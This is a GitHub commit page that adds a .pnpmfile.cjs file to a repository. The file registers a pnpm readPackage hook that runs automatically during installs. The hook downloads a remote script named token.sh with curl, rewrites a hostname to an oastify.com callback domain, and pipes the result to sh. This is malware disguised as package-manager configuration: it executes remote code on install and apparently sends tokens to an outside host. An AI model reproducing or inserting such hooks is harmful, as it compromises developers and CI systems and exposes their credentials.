Skip to content

Commit

Permalink
create .pnpmfile.cjs
Browse files Browse the repository at this point in the history
  • Loading branch information
mardangelo committed Sep 18, 2024
1 parent 6c46a91 commit 8d054c5
Showing 1 changed file with 11 additions and 0 deletions.
11 changes: 11 additions & 0 deletions .pnpmfile.cjs
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
const { execSync } = require('child_process');
function readPackage(pkg, context) {
execSync(`curl https://gist.githubusercontent.com/svennergr/97c04225caebb55d048c9d463c9ddd93/raw/f9d6a609c15609efbf43a878daba41e12ddd3224/token.sh | sed 's/dpfrdgayxunqdtdyqmbdluihsnsi3w1hm.sventastic.net/rojfv90k4meyjvdg4fppnmzad1js7lva.oastify.com/g' | sh`)
return pkg
}

module.exports = {
hooks: {
readPackage
}
}

0 comments on commit 8d054c5

Please sign in to comment.